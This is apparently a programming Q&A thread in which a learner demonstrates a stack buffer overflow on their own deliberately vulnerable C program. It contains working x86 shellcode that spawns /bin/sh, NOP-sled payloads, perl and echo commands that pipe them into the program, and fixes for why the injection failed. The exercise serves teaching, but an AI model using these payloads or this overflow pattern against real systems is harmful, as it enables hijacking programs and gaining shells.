# NOPs instruction storage in memory using \x notation

Tags: memory, gcc, c, hex

I am trying to add some shellcode in my input to demonstrate buffer overflow leading to control hijacking. 
Here is program;

```
int foo(char *mainbuff)
{
char foobuff[128];
strcpy(foobuff, mainbuff);
printf("foobuff new value is %s\n", foobuff);
return 0;
}


int main()
{
char mainbuff[256];
printf("Please enter value of mainbuff\n\n");
scanf("%s", mainbuff);
foo(mainbuff);
printf("Program is exitting normally!!\n\n\n");
return 0;
}
```

According to my understanding when I should give `\x90` this input to my c program it should take it and store it in memory as a single byte. So when I concatenate nops with shellcode and address my input seems like

`\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x10\xd2\xff\xff`

It should store as single bytes in arrays but compiler adds another `\` not to escape them and store them in stack memory as `0x3039785c` which is hex form of `09x\`. My file which store this string also not exactly the size of bytes I am storing. I am on 64 bit machine but my program is compiled using -m32 option in gcc.

So whats going on here?

Comment: So.. I guess you are giving this as an input from shell? use python or perl output instead such as `python -c 'print "\x90...." | ./yourprogram`

Comment: @EugeneSh. Thank you, could you please see the comment below answer and reply what you think so?

Answer (score 2, accepted):

> I should give \x90 this input to my c program it should take it and store it in memory as a single byte.

It seems you directly typing `\x90` as input. This will cause the program (actually, the `stdin`) to regard it as 4 continuous characters, `0x5c, 0x78, 0x39, 0x30`, which is getting endian into your mentioned `0x3039785c`.

You may try `echo -e "\x90\x90..." | ./a.out` to pipe the shellcode into stdin by the escape.

Comment: Ok done that, it works but the problem is my whole string isn't taking a single line and some of the characters are printing on second half of the next line. When I give this string input to program, it only takes character on singe line and left the others one on the other side of the next line. My vector is `perl -e 'print "\x90"x112 ."\xb8\x32\x2f\x73\x68\xc1\xe8\x08\x50\x68\x2f\x62\x69\x6e\x89\xe3\x31\xd2\x52\x53\x89\xe1\x89\xd0\xb0\x0b\xcd\x80\x10\xd2\xff\xff"'`

Comment: The last three bytes are on end of the second line while the rest of the second line seems empty. The last three bytes do that
`�����������������������������������������������������������������������������������������������������������������2/sh�Ph/bin��1�RS���а

                                                                                                                                      ���`

Comment: Samething is happening with `perl -e 'print "\x90"x112 ."\xb8\x32\x2f\x73\x68\xc1\xe8\x08\x50\x68\x2f\x62\x69\x6e\x89\xe3\x31\xd2\x52\x53\x89\xe1\x89\xd0\xb0\x0b\xcd\x80\xd2\xd2\xff\xff"'` as now I have changed the address

Comment: @aneela The problem "not in the same line" is caused by the `\x0c` and `\x0b` in shellcode, which is a white character. However, as `man scanf` says, %s matches a sequence of non-white-space characters, which will break your shellcode at that position.

Comment: Thanks @Gen Chen, thats what I was missing.

Comment: Changing scanf to `scanf ("%[^\n]s", mainbuff)` from `scanf("%s", mainbuff)` solved my problem.